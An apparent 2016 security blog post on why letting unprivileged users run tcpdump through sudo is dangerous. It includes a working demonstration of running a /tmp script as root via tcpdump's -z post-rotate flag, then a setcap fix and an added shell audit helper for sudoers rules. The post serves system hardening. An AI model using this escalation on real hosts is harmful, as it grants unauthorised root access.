Wednesday, April 6, 2016

Why sudo tcpdump is dangerous

Do you have Linux hosts with non-privileged users allowed to run tcpdump by placing tcpdump in the sudoers file? tcpdump has a -z flag that allows you to specify a post-rotate command to run. The user can create a text file in /tmp with commands that will be executed as root.

Although this isn't a newly discovered hack, it bears repeating because it is still seen in production environments.

$ sudo -l
[sudo] password for john:
User john may run the following commands on this host:
    (root) /usr/sbin/tcpdump

-z postrotate-command
Used in conjunction with the -C or -G options, this will make tcpdump run "postrotate-command file" where file is the savefile being closed after each rotation. For example, specifying -z gzip or -z bzip2 will compress each savefile using gzip or bzip2.

A way to test this is to create a file /tmp/.test containing the "id" command, then run: "sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root"

It will output:
uid=0(root) gid=0(root) groups=0(root)

The way to fix this:
With the following commands we can run tcpdump as a normal user instead of as root.

setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump
getcap /usr/sbin/tcpdump
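As an added example (not part of the original post), a small POSIX shell audit that counts sudoers rules granting tcpdump and checks a getcap line for the two capabilities the fix sets; it runs on a constructed sample sudoers text, and the SAMPLE_SUDOERS content and the function names are my own.

```shell
#!/bin/sh
# Added audit helper, not code from the original post.
# Part 1: find sudoers rules that hand tcpdump to a user as root.
# Part 2: confirm the capability-based fix from a getcap output line.

# Constructed sample sudoers content (not a real host's file).
SAMPLE_SUDOERS='# constructed sample, not a real host
Defaults env_reset
root    ALL=(ALL:ALL) ALL
john    ALL=(root) /usr/sbin/tcpdump
%netops ALL=(root) NOPASSWD: /usr/sbin/tcpdump
alice   ALL=(ALL) /usr/bin/systemctl restart nginx
'

# Print the number of non-comment rules that grant tcpdump via sudo.
# Every such rule exposes the -z post-rotate hook, because the user
# controls tcpdump's arguments and the hook runs as the sudo target user.
# Reads sudoers text on stdin; always exits 0 so it is safe under set -e.
count_tcpdump_sudo_rules() {
    grep -v '^[[:space:]]*#' | grep -Ec '[[:space:]/]tcpdump([[:space:]]|$)' || true
}

# Check one getcap output line for the capabilities the setcap fix grants.
# Accepts both output styles: "path = cap_a,cap_b+eip" (older libcap)
# and "path cap_a,cap_b=eip" (newer libcap). Returns 0 only when both
# cap_net_raw and cap_net_admin are present, 1 otherwise.
# With file capabilities instead of sudo, tcpdump keeps the invoking
# user's uid, so a -z command runs as that user rather than as root.
has_capture_caps() {
    caps=$(printf '%s\n' "$1" | sed 's/^[^ ]* *=* *//')
    case "$caps" in
        *cap_net_raw*) ;;
        *) return 1 ;;
    esac
    case "$caps" in
        *cap_net_admin*) return 0 ;;
        *) return 1 ;;
    esac
}

# Stand-alone run over the constructed sample: prints 2 (john and %netops).
printf '%s' "$SAMPLE_SUDOERS" | count_tcpdump_sudo_rules
```

Remember that file capabilities let anyone who can execute the binary capture traffic, so pair setcap with restricting execute permission on /usr/sbin/tcpdump to a dedicated group.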